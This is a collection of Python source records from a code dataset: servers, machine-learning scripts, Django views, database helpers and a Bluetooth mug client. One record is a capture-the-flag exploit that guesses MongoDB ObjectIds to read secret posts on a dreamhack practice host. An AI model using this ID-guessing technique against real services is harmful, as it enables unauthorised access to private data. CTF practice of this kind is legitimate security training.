self.emit('new_transaction', transaction)\r\n self.transactions.append(transaction)\r\n await asyncio.sleep(30)\r\n","sub_path":"aiobml/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
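Based on the docstrings above, a minimal consumer of this client might look like the following sketch; the credentials are placeholders, and running start() forever in run_until_complete is an assumption about how the library is meant to be driven:

import asyncio
from aiobml.client import asyncBML  # matches this record's sub_path

bank = asyncBML(username="user", password="pass")  # placeholder credentials

@bank.event('new_transaction')
async def on_transaction(tx):
    # Fires once per transaction this process has not seen before.
    print(tx)

# start() polls get_history() every 30 seconds and emits events.
asyncio.get_event_loop().run_until_complete(bank.start())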
+{"seq_id":"578153490","text":"from flask import Flask, render_template\nfrom pymavlink import mavutil\nfrom msgdef import *\nimport socket\nimport os\nimport threading\n\nHOST = '127.0.0.1' #Server IP address\nPORT = 65432 #Server port\nfirstTime = True #Indicates whether its the first time to call my_server()\ndata_view = \"\"\"\"\"\" #Store data to view on webpage\nbufferSize = 512\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/init')\ndef init():\n server()\n\n@app.route('/data')\ndef data():\n return f\"\"\"\"\"\"+ data_view +''\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404\n\ndef server():\n global data_view\n global firstTime\n\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #Create a UDP socket\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) #Allow socket to reuse port\n s.bind((HOST, PORT)) #Bind socket to port\n\n sensorConnection = mavutil.mavlink_connection('udpin:localhost:14540') #Create a MAVLink connection to receive sensor data\n\n if firstTime:\n # Indicating the server has started\n print(\"Server Started waiting for clients to connect \")\n firstTime = False\n receiveDataAndSendActuatorSignal(sensorConnection, s) \n\ndef receiveDataAndSendActuatorSignal(mavlink, socket):\n global data_view\n\n with socket:\n while True:\n try:\n data, addr = socket.recvfrom(bufferSize) #Receive UDP client port\n except:\n data = b''\n if len(data) != 0: #Checks if UDP client is connected\n imu_msg = mavlink.recv_match(type='HIGHRES_IMU', blocking=True, timeout = 0.001) #Receive sensor data through MAVLink\n if imu_msg == None:\n continue #Restart loop if no data is received \n print(imu_msg)\n\n actuatorSignal = imu_msg.xacc * 1.5 #Generate some actuator signal\n encodedData = str(actuatorSignal).encode('utf-8') # Encoding the signal\n socket.sendto(encodedData, addr) # Send the byte stream to client\n\n data_view = f'''Actuator Signal: {actuatorSignal}
X Acceleration: {imu_msg.xacc}
\n Y Acceleration: {imu_msg.yacc}
Z Acceleration: {imu_msg.zacc}
\n X Gyro: {imu_msg.xgyro}
Y Gyro: {imu_msg.ygyro}
\n Z Gyro: {imu_msg.zgyro}
''' + data_view\n\ndef url():\n os.system('cmd /k \"lt --port 5000\"')\n\nif __name__ == '__main__':\n threading.Thread(target=url).start() #Start local tunnel\n app.run(debug=True, host='0.0.0.0') #Build the Flask app","sub_path":"UDP MAVLink Server/serverPi.py","file_name":"serverPi.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
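For reference, a minimal UDP client that would pair with this server: any datagram tells the server the client's address, after which the server replies with the actuator signal as UTF-8 text. Host/port mirror the constants above; the b'poll' payload is an arbitrary placeholder:

import socket

HOST, PORT = '127.0.0.1', 65432  # must match the server constants

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
    sock.sendto(b'poll', (HOST, PORT))   # announce our address to the server
    data, _ = sock.recvfrom(512)         # actuator signal, utf-8 encoded float
    print('actuator signal:', float(data.decode('utf-8')))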
+{"seq_id":"286720917","text":"\"\"\"\nRank related code\n\"\"\"\n\nfrom scipy.stats import rankdata\n\n\ndef rank_artists(data, ranks, age_range=None, distances=None):\n \"\"\"\n Ranks artists based on different criteria.\n @param distances: distances to film set calculated for all artists\n @param age_range: tuple with age range artists has been filtered by\n @param ranks: string containing requested ranks\n @param data: Artists data\n \"\"\"\n all_ranks = []\n try:\n for rank in ranks.split(','):\n rank_key, unused_, weight = rank.partition(':')\n if rank_key == 'age':\n if age_range:\n middle_age_range = age_range[0] + ((age_range[1] - age_range[0]) / 2.0)\n else:\n ages = [a['age'] for a in data['artists']]\n min_age = min(ages)\n max_age = max(ages)\n middle_age_range = min_age + (max_age - min_age) / 2.0\n r = rankdata([abs(middle_age_range - a[rank_key]) for a in data['artists']])\n elif rank_key == 'distance':\n r = rankdata([distances[a['uuid']] for a in data['artists']])\n else:\n r = rankdata([a[rank_key] for a in data['artists']])\n if weight:\n try:\n weight = float(weight)\n except ValueError:\n raise TypeError('Wrong rank requested!')\n r = [e * weight for e in r]\n all_ranks.append(r)\n except KeyError:\n raise TypeError('Wrong rank requested!')\n else:\n ranks = {r[0]: sum(r[1:]) for r in zip((a['uuid'] for a in data['artists']), *all_ranks)}\n data['artists'].sort(key=lambda x: ranks[x['uuid']])\n","sub_path":"the_artist/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"28492708","text":"#!/bin/python\n\n# This is a program to calculate a buy range for a proper buy point.\n# It adds 5% to the proper buy point.\n\n\ndef stkData():\n ni = i.upper()\n b = input('Buy point? ')\n t = float(b) * 1.05\n t = round(t, 2)\n print(str(i) + ' -- ' + str(b) + ' -- ' + str(t))\n txt = str(ni) + ' -- ' + str(b) + ' -- ' + str(t)\n f.write(str(txt))\n f.write(\"\\n\")\n f.write(\"\\n\")\n\n\nf = open(\"/home/sot/Desktop/buyRange.txt\", \"a\")\nwhile True:\n i = input('Symbol? ')\n if i == '':\n f.close()\n break\n stkData()\n","sub_path":".local/bin/buyRange.py","file_name":"buyRange.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"90380195","text":"import requests, string, itertools\n\n# mongodb object id rule\n# 4byte(timestamp) + 5byte(machine based random) + 3byte(index count)\n# guess available for timestamp, indexcount\n\n# api/board/:query_no doesn't check if it's secret(READ CODE!!)\npost_1 = '64 11 5d 59 c30c6c4f03 502e1c'\npost_2 = '64 11 5d 5e c30c6c4f03 502e1d'\npost_4 = '64 11 5d 61 c30c6c4f03 502e1f'\n\nalpha_nums = list(string.ascii_lowercase + string.digits)\nperms = itertools.permutations(alpha_nums, 2)\n\n# for i in perms:\nfor i in ['5f', '60']:\n query_no = f'64115d{i}c30c6c4f03502e1e'\n res = requests.get(f'http://host3.dreamhack.games:12830/api/board/{query_no}')\n print(f'{query_no} : {res.status_code}')\n print(res.content)","sub_path":"web_hacking/problems/lv1-mongoboard/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"342115225","text":"# Use the probability(hand, deck) function in this file \r\n# to calculate the probability of getting a certain hand \r\n# given a randomly shuffled deck.\r\n\r\n# The main() function in this file\r\n# computes the probability of getting all possible hands\r\n# given a randomly shuffled deck containing 7 copper and 3 estate.\r\n\r\n# Michael Chu\r\n# 5/22/20\r\n\r\nimport math\r\n\r\nHANDSIZE = 5\r\n\r\n# Returns the number of spots left in the hand we're trying to build (given a certain base b)\r\ndef spotsLeft(b):\r\n spots = HANDSIZE\r\n for n in b.values():\r\n spots = spots - n\r\n return spots\r\n\r\n# Calculates n choose r\r\ndef nCr(n,r):\r\n f = math.factorial\r\n return f(n)/(f(r)*f(n-r))\r\n\r\n# Calculates the number of cards in deck d\r\ndef nCards(d):\r\n count = 0\r\n for n in d.values():\r\n count += n\r\n return count\r\n\r\n# Returns all possible hands of 5 cards given a certain base and a certain deck\r\ndef hands(deck,base={}):\r\n # Makes copies so as to not disturb the originals\r\n d = deck.copy()\r\n b = base.copy()\r\n\r\n # If the deck is empty, return base (as long at it is a valid hand)\r\n if len(d)==0:\r\n spots = spotsLeft(b)\r\n if spots > 0:\r\n return []\r\n elif spots == 0:\r\n return [b]\r\n else:\r\n return [\"INVALID HAND\"]\r\n\r\n # Otherwise... Pick a card type from the deck \r\n cardType = list(d)[0]\r\n amount = d[cardType]\r\n \r\n # Update the deck\r\n del d[cardType]\r\n\r\n # Figure out how many spots in the hand are left\r\n spots = spotsLeft(b)\r\n\r\n # Generate hands with i of the card type\r\n handList = []\r\n for i in range(0,min(spots,amount)+1):\r\n b[cardType] = i\r\n handList += hands(d,b)\r\n\r\n return handList\r\n\r\n# Calculates probability of getting a certain hand given a randomly shuffled deck\r\ndef probability(hand,deck):\r\n successes = 1\r\n for card,amount in hand.items(): \r\n successes = successes*nCr(deck[card],amount)\r\n possible = nCr(nCards(deck),5)\r\n\r\n prob = successes/possible\r\n return prob\r\n\r\ndef main():\r\n deck = {\"copper\":7,\r\n \"estate\":3}\r\n print(\"Deck: \",deck)\r\n print()\r\n\r\n possibleHands = hands(deck)\r\n print(\"Possible Hands:\")\r\n print(possibleHands)\r\n print()\r\n\r\n print(\"Probabilities:\")\r\n probabilities = {}\r\n for hand in possibleHands:\r\n prob = probability(hand,deck)\r\n print(hand,prob)\r\n probabilities[tuple(hand.items())] = prob\r\n print()\r\n print(probabilities)\r\n print()\r\n\r\n sum = 0\r\n for prob in probabilities.values():\r\n sum += prob\r\n print(\"Sum of Probabilities: \",sum)\r\n\r\nmain()\r\n","sub_path":"probabilities.py","file_name":"probabilities.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"278435494","text":"from flask import current_app as app\n\n@app.route('/HOOK',methods = ['POST','GET'])\ndef webhook():\n\tif request.method == \"POST\":\n\t\tupdate = telegram.Update.de_json(request.get_json(force=True),bot)\n\t\tdispatcher.process_update(update)\n\t\tupdate_queue.put(update)\n\t\treturn \"OK\"\n\telse:\n\t\treturn \"You are browser!\"\n\n\n\n#Set_webhook\n@app.route('/set_webhook', methods = ['GET', 'POST'])\ndef set_webhook():\n\ts = bot.setWebhook('https://%s:443/HOOK' % URL, certificate = open('/etc/ssl/admin/server.crt','rb'))\n\tif s:\n\t\tprint(s)\n\t\treturn \"webhook setup ok\"\n\telse:\n\t\treturn \"webhook setup failed\"\n \n \n","sub_path":"bot/application-bot/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"61598553","text":"from random import randint\nfrom time import sleep\nfrom operator import itemgetter\njogo = {'jogador1': randint(1, 6),\n 'jogador2': randint(1, 6),\n 'jogador3': randint(1, 6),\n 'jogador4': randint(1, 6)}\nprint('- ' * 20)\nranking = []\nsleep(1)\nfor k, v in jogo.items():\n print(f'{k} jogou {v} no dado.')\n sleep(1)\nprint('- ' * 20)\nranking = sorted(jogo.items(), key=itemgetter(1), reverse=True)\nfor i, d in enumerate(ranking):\n print(f'{i + 1}º lugar: {d[0]} com {d[1]}')\n","sub_path":"Desafios/des091a.py","file_name":"des091a.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"264498547","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom .forms import BookingForm\nfrom django.contrib import messages\nfrom .models import Booking\nfrom django.core.urlresolvers import reverse\n\ndef booking_create(request):\n form = BookingForm(request.POST or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.user = request.user\n instance.save()\n messages.success(request, \"successfully created\")\n return reverse(request, 'booking/detail.html', instance.get_absolute_url())\n else:\n messages.error(request, \"Not Successfully Created\")\n context = {\n \"form\": form,\n }\n return render(request, 'booking/form.html', context)\n\ndef booking_detail(request):\n instance = get_object_or_404(booking_create)\n context = {\n \"title\": instance.title,\n \"instance\": instance,\n }\n return render(request, 'booking/detail.html', context)\n\ndef booking_list(request):\n queryset = Booking.objects.all()\n context = {\n \"object_list\": queryset,\n \"title\": \"List\"\n }\n return render(request, 'booking/list.html', context)\n\ndef booking_edit(request):\n instance = get_object_or_404(Booking, id=id)\n form = BookingForm(request.POST or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n messages.success(request, \"Item Saved\", extra_tags='html_safe')\n return redirect(instance.get_absolute_url())\n\n context = {\n \"id\": instance.id,\n \"instance\": instance,\n \"form\": form,\n }\n return render(request, \"\", context)\n\ndef booking_delete(request):\n instance = get_object_or_404(Booking)\n instance.delete()\n messages.success(request, \"Successfully deleted\")\n return redirect(\"booking:list\")","sub_path":"booking/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"124135042","text":"# from openvino.inference_engine import IENetwork, IEPlugin\nimport numpy as np\nimport cv2\nimport time\nimport sys\nimport argparse\nimport imutils\nimport time\nimport cv2\nimport os\nimport glob\nfrom tqdm import tqdm\n# 실시간 추적 모듈 sort 사용\nfrom sort import *\n\ncam_w = 320\ncam_h = 240\nimage_size = 416\n\n# cam에 맞는 size로 맞추기 위한 w,h\nnew_w = int(cam_w * min(image_size/cam_w, image_size/cam_h))\nnew_h = int(cam_h * min(image_size/cam_w, image_size/cam_h))\n\nxml_path = '/home/pi/workspace/IR/tiny-yolov3.xml'\nbin_path = '/home/pi/workspace/IR/tiny-yolov3.bin'\n\nLABELS = (\"person\", \"bicycle\", \"car\", \"motorbike\", \"aeroplane\",\n \"bus\", \"train\", \"truck\", \"boat\", \"traffic light\",\n \"fire hydrant\", \"stop sign\", \"parking meter\", \"bench\", \"bird\",\n \"cat\", \"dog\", \"horse\", \"sheep\", \"cow\",\n \"elephant\", \"bear\", \"zebra\", \"giraffe\", \"backpack\",\n \"umbrella\", \"handbag\", \"tie\", \"suitcase\", \"frisbee\",\n \"skis\", \"snowboard\", \"sports ball\", \"kite\", \"baseball bat\",\n \"baseball glove\", \"skateboard\", \"surfboard\",\"tennis racket\", \"bottle\",\n \"wine glass\", \"cup\", \"fork\", \"knife\", \"spoon\",\n \"bowl\", \"banana\", \"apple\", \"sandwich\", \"orange\",\n \"broccoli\", \"carrot\", \"hot dog\", \"pizza\", \"donut\",\n \"cake\", \"chair\", \"sofa\", \"pottedplant\", \"bed\",\n \"diningtable\", \"toilet\", \"tvmonitor\", \"laptop\", \"mouse\",\n \"remote\", \"keyboard\", \"cell phone\", \"microwave\", \"oven\",\n \"toaster\", \"sink\", \"refrigerator\", \"book\", \"clock\",\n \"vase\", \"scissors\", \"teddy bear\", \"hair drier\", \"toothbrush\")\n\n# network 생성\n# net = IENetwork(model = xml_path,weights = bin_path)\n\n# device (MYRIAD : NCS2)\n# plugin = IEPlugin(device='MYRIAD')\n# exec_net = plugin.load(net)\n\n# cam on/cam setting\ncam = cv2.VideoCapture(0)\ncam.set(cv2.CAP_PROP_FPS, 30)\ncam.set(cv2.CAP_PROP_FRAME_WIDTH, cam_w)\ncam.set(cv2.CAP_PROP_FRAME_HEIGHT, cam_h)\n\nwhile(True) :\n # frame preprossing\n ret, frame = cam.read()\n resized_image = cv2.resize(frame, (image_size, image_size), interpolation=cv2.INTER_CUBIC)\n\n # 128로 채운다\n canvas = np.full((image_size, image_size, 3), 128)\n canvas[(image_size - new_h) // 2:(image_size - new_h) // 2 + new_h, (image_size - new_w) // 2:(image_size - new_w) // 2 + new_w, :] = resized_image\n\n prepimg = canvas\n\n prepimg = resized_image[np.newaxis, :, :, :] # Batch size axis add\n prepimg = prepimg.transpose((0, 3, 1, 2)) # NHWC to NCHW\n\n start = time.time()\n\n cv2.imshow('image', prepimg)\n # inference\n # res = exec_net.infer({'inputs': prepimg})\n\n end = time.time()\n\n print('inference time : ', end - start)\n\n\n\n k = cv2.waitKey(10) & 0xFF\n if k == 27:\n break\n\ncam.release()\ncv2.destroyAllWindows()\n\n\n\n","sub_path":"openvino.py","file_name":"openvino.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"329179178","text":"# -*- coding: utf-8 -*-\n#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport time\nimport random\n\nfrom sqlalchemy import event, exc, select\n\nfrom airflow.utils.log.logging_mixin import LoggingMixin\n\nlog = LoggingMixin().log\n\n\ndef setup_event_handlers(\n engine,\n reconnect_timeout_seconds,\n initial_backoff_seconds=0.2,\n max_backoff_seconds=120):\n\n @event.listens_for(engine, \"engine_connect\")\n def ping_connection(connection, branch):\n \"\"\"\n Pessimistic SQLAlchemy disconnect handling. Ensures that each\n connection returned from the pool is properly connected to the database.\n\n http://docs.sqlalchemy.org/en/rel_1_1/core/pooling.html#disconnect-handling-pessimistic\n \"\"\"\n if branch:\n # \"branch\" refers to a sub-connection of a connection,\n # we don't want to bother pinging on these.\n return\n\n start = time.time()\n backoff = initial_backoff_seconds\n\n # turn off \"close with result\". This flag is only used with\n # \"connectionless\" execution, otherwise will be False in any case\n save_should_close_with_result = connection.should_close_with_result\n\n while True:\n connection.should_close_with_result = False\n\n try:\n connection.scalar(select([1]))\n # If we made it here then the connection appears to be healty\n break\n except exc.DBAPIError as err:\n if time.time() - start >= reconnect_timeout_seconds:\n log.error(\n \"Failed to re-establish DB connection within %s secs: %s\",\n reconnect_timeout_seconds,\n err)\n raise\n if err.connection_invalidated:\n log.warning(\"DB connection invalidated. Reconnecting...\")\n\n # Use a truncated binary exponential backoff. Also includes\n # a jitter to prevent the thundering herd problem of\n # simultaneous client reconnects\n backoff += backoff * random.random()\n time.sleep(min(backoff, max_backoff_seconds))\n\n # run the same SELECT again - the connection will re-validate\n # itself and establish a new connection. The disconnect detection\n # here also causes the whole connection pool to be invalidated\n # so that all stale connections are discarded.\n continue\n else:\n log.error(\n \"Unknown database connection error. 
Not retrying: %s\",\n err)\n raise\n finally:\n # restore \"close with result\"\n connection.should_close_with_result = save_should_close_with_result\n\n\n @event.listens_for(engine, \"connect\")\n def connect(dbapi_connection, connection_record):\n connection_record.info['pid'] = os.getpid()\n\n\n @event.listens_for(engine, \"checkout\")\n def checkout(dbapi_connection, connection_record, connection_proxy):\n pid = os.getpid()\n if connection_record.info['pid'] != pid:\n connection_record.connection = connection_proxy.connection = None\n raise exc.DisconnectionError(\n \"Connection record belongs to pid {}, \"\n \"attempting to check out in pid {}\".format(connection_record.info['pid'], pid)\n )\n","sub_path":"airflow/utils/sqlalchemy.py","file_name":"sqlalchemy.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
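To see the retry cadence ping_connection produces, here is a standalone simulation of the same truncated exponential backoff with jitter (sleep durations only, no database involved); backoff_schedule is a hypothetical helper, not part of the module above:

import random

def backoff_schedule(initial=0.2, max_backoff=120, attempts=10):
    """Mirror ping_connection's backoff: grow by a random factor in [1, 2)."""
    backoff, sleeps = initial, []
    for _ in range(attempts):
        backoff += backoff * random.random()
        sleeps.append(min(backoff, max_backoff))
    return sleeps

print(backoff_schedule())  # e.g. [0.27, 0.41, 0.55, ...], roughly 1.5x growth per retry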
+{"seq_id":"588685759","text":"import json\nimport os\nimport wget\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0, 1, 3\"\n\n# Load sarcasm dataset\ndata_dir = 'sarcasm'\nfilename = os.path.join(data_dir, 'sarcasm.json')\nif not os.path.exists(data_dir):\n # Download dataset\n os.mkdir(data_dir)\n url = 'https://storage.googleapis.com/laurencemoroney-blog.appspot.com/sarcasm.json'\n filename = wget.download(url, out=data_dir)\n\nwith open(filename, 'r') as f:\n datastore = json.load(f)\n\nvocab_size = 10000\nembedding_dim = 16\nmax_length = 100\ntrunc_type = 'post'\npadding_type = 'post'\noov_tok = \"\"\ntraining_size = 20000\n\nsentences = []\nlabels = []\n\nfor item in datastore:\n sentences.append(item['headline'])\n labels.append(item['is_sarcastic'])\n\ntraining_sentences = sentences[0:training_size]\ntesting_sentences = sentences[training_size:]\ntraining_labels = labels[0:training_size]\ntesting_labels = labels[training_size:]\n\ntokenizer = Tokenizer(num_words=vocab_size, oov_token=oov_tok)\ntokenizer.fit_on_texts(training_sentences)\n\nword_index = tokenizer.word_index\n\ntraining_sequences = tokenizer.texts_to_sequences(training_sentences)\ntraining_padded = pad_sequences(training_sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\n\ntesting_sequences = tokenizer.texts_to_sequences(testing_sentences)\ntesting_padded = pad_sequences(testing_sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\n\n# Need this block to get it to work with TensorFlow 2.x\n\ntraining_padded = np.array(training_padded)\ntraining_labels = np.array(training_labels)\ntesting_padded = np.array(testing_padded)\ntesting_labels = np.array(testing_labels)\n\nmodel = tf.keras.Sequential([\n tf.keras.layers.Embedding(vocab_size, embedding_dim, input_length=max_length),\n tf.keras.layers.GlobalAveragePooling1D(),\n tf.keras.layers.Dense(24, activation='relu'),\n tf.keras.layers.Dense(1, activation='sigmoid')\n])\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nmodel.summary()\n\nnum_epochs = 30\nhistory = model.fit(training_padded, training_labels, epochs=num_epochs,\n validation_data=(testing_padded, testing_labels), verbose=2)\n\n\ndef plot_graphs(history, string):\n plt.plot(history.history[string])\n plt.plot(history.history['val_' + string])\n plt.xlabel(\"Epochs\")\n plt.ylabel(string)\n plt.legend([string, 'val_' + string])\n plt.show()\n\n\nplot_graphs(history, \"accuracy\")\nplot_graphs(history, \"loss\")\n\nreverse_word_index = dict([(value, key) for (key, value) in word_index.items()])\n\n\ndef decode_sentence(text):\n return ' '.join([reverse_word_index.get(i, '?') for i in text])\n\n\nprint(decode_sentence(training_padded[0]))\nprint(training_sentences[2])\nprint(labels[2])\n\ne = model.layers[0]\nweights = e.get_weights()[0]\nprint(weights.shape) # shape: (vocab_size, embedding_dim)\n\nsentence = [\"granny starting to fear spiders in the garden might be real\",\n \"game of thrones season finale showing this sunday night\"]\nsequences = tokenizer.texts_to_sequences(sentence)\npadded = pad_sequences(sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type)\nprint(model.predict(padded))\n\n# End of file 
tag\nprint('eof')\n","sub_path":"_35_SarcasmClassifier.py","file_name":"_35_SarcasmClassifier.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"61060928","text":"import os\r\nimport logging\r\nimport datetime\r\nimport time\r\nimport pymysql\r\nimport configparser\r\nfrom confluent_kafka import KafkaError,Consumer,KafkaException\r\nfrom bson import json_util, ObjectId\r\nfrom bson.json_util import dumps,loads,JSONOptions,DEFAULT_JSON_OPTIONS\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\n\"\"\" 创建一个从KAFKA数据库拉取数据的类\"\"\"\r\n\"\"\"從未加認證的主機接數據\"\"\"\r\nclass Fetch(object) :\r\n\t\"\"\"重写类的初始化属性\"\"\"\r\n\tdef __init__(self) :\r\n\t\tself.config = configparser.RawConfigParser()\r\n\t\tself.config.read('./config.cfg')\r\n\t\tif not os.path.exists('./Log'):\r\n\t\t\tos.makedirs('./Log')\r\n\t\tlogging.basicConfig(filename='./Log/'+datetime.datetime.today().strftime(\"%Y%m%d\")+'.log'\r\n\t\t\t, level=logging.INFO\r\n\t\t\t, format='%(asctime)s %(message)s'\r\n\t\t\t, datefmt='%Y/%m/%d %I:%M:%S %p')\r\n\t\t\r\n\t\t\"\"\"建立与kafka数据库连接的客户端,group.id随意命名,保证其他人没有在使用这个id,因为一个id只能拉取一次数据,每次拉取数据都拉取七天前到现在的数据\"\"\"\r\n\t\ttry :\r\n\t\t\tSource_Kafka_Consumer = Consumer({\r\n\t\t\t\t\t'bootstrap.servers':'xx.xx.xx.xx:xx'\r\n\t\t\t\t\t,'group.id':'careyfetch'\r\n\t\t\t\t\t,'auto.offset.reset':'earliest'\r\n\t\t\t\t\t, 'session.timeout.ms': 6000\r\n\t\t\t\t\t})\r\n\t\t\tDEFAULT_JSON_OPTIONS.strict_uuid = True\r\n\t\t\tSource_Kafka_Consumer.subscribe(['xxx.xxx.xxx'])\t\t#指定要拉取哪个topic的数据\r\n\t\t\tself.consumer = Source_Kafka_Consumer\r\n\t\texcept Exception as inst:\r\n\t\t\tprint('kafaka Connection Fail')\r\n\t\t\tprint(inst)\r\n\t\t\tlogging.error('kafaka Connection Fail')\r\n\t\t\tlogging.error(inst)\r\n\t\r\n\t\"\"\"这是一个从kafka数据库拉取数据的函数范例\"\"\"\r\n\tdef fetch_xxxx(self):\r\n\t\ttry:\r\n\t\t\tonelist = []\r\n\t\t\tcount = 0\r\n\t\t\twhile True:\r\n\t\t\t\t\"\"\"通过创建好连接kafka客服端和相关参数,拉取数据\"\"\"\r\n\t\t\t\tmsg = self.consumer.poll(1)\r\n\t\t\t\tif msg is None:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tif msg.error():\r\n\t\t\t\t\tprint('Consumer error: {}'.format(msg.error()))\r\n\t\t\t\t\tcontinue\r\n\t\t\t\t\"\"\"取出数据,和存储数据\"\"\"\r\n\t\t\t\tdata = json_util.loads(msg.value())\r\n\t\t\t\tonelist.append(data)\r\n\t\t\t\tcount = count + 1\r\n\t\t\t\tif count == 1000 :\r\n\t\t\t\t\tbreak\r\n\t\t\tself.consumer.close()\r\n\t\texcept Exception as inst:\r\n\t\t\t\tprint('kafaka fetch meterbase Fail')\r\n\t\t\t\tprint(inst)\r\n\t\t\t\tlogging.error('happen kafaka fecth meterbase Fail')\r\n\t\t\t\tlogging.error(inst)\r\n\t\treturn onelist\r\n","sub_path":"fetchkafka.py","file_name":"fetchkafka.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"46799818","text":"#!/usr/bin/env python3\n\n\nimport numpy as np\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Evaluator(object):\n\n def __init__(self, trainer, discount_factor):\n self._trainer = trainer\n self._discount_factor = discount_factor\n self.mc_loss = []\n self.td_loss = []\n\n def report(self, episode_values, predictions, td_loss):\n mc_loss = float(np.mean(np.abs(episode_values - predictions)))\n td_loss_mean = float(np.mean(td_loss))\n self.mc_loss.append(mc_loss)\n self.td_loss.append(td_loss_mean)\n logger.info(\"MC LOSS: {0:.3f} TD LOSS: {1:.3f}\".format(mc_loss, td_loss_mean))\n\n def get_recent_td_loss(self):\n begin = max(0, len(self.td_loss) - 100)\n return np.mean(np.array(self.td_loss[begin:]))\n\n def get_recent_mc_loss(self):\n begin = max(0, len(self.mc_loss) - 100)\n return np.mean(np.array(self.mc_loss[begin:]))\n","sub_path":"ml/rl/training/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"356004436","text":"import asyncio\nfrom sys import platform\nimport logging\nfrom bleak import BleakClient, BleakScanner\n\nUUIDS = {\n \"target_temp\": \"fc540003-236c-4c94-8fa9-944a3e5353fa\",\n \"led_color\": \"fc540014-236c-4c94-8fa9-944a3e5353fa\",\n \"current_temp\": \"fc540002-236c-4c94-8fa9-944a3e5353fa\",\n \"current_bat\": \"fc540007-236c-4c94-8fa9-944a3e5353fa\",\n}\n\nlogging.basicConfig(format=\"%(asctime)s %(message)s \", level=logging.INFO)\n\n\nclass Mug:\n def __init__(self, unit: str, coffeeTemp=5500, teaTemp=5900):\n self.unit = unit\n self.coffeeTemp = coffeeTemp\n self.teaTemp = teaTemp\n self.keepConnectionAlive = True\n self.searchForDevice = True\n self.current_temp = None\n\n async def connectToMug(self):\n try:\n print(\"Searching..\", end=\"\")\n # self.connectionChanged.emit(False)\n # Search for the mug as long til we find it.\n while self.searchForDevice:\n print(\".\", end=\"\")\n scanner = BleakScanner()\n # scanner.register_detection_callback(detection_callback)\n await scanner.start()\n await asyncio.sleep(5.0)\n await scanner.stop()\n devices = await scanner.get_discovered_devices()\n for device in devices:\n if device.name == \"Ember Ceramic Mug\":\n # We found the ember mug!\n print(device.address)\n print(device.name)\n print(device.details)\n # try to connect to the mug\n async with BleakClient(device) as client:\n self.connectedClient = client\n self.isConnected = await client.is_connected()\n print(\"Connected: {0}\".format(self.isConnected))\n if platform != \"darwin\":\n # Avoid this on mac, since CoreBluetooth doesnt support pairing.\n y = await client.pair()\n print(\"Paired: {0}\".format(y))\n # Set connection parameters and use signal to send it to the UI.\n self.keepConnectionAlive = True\n # self.connectionChanged.emit(True)\n # await self.fetchLEDColor(self)\n # Auto update Temp and 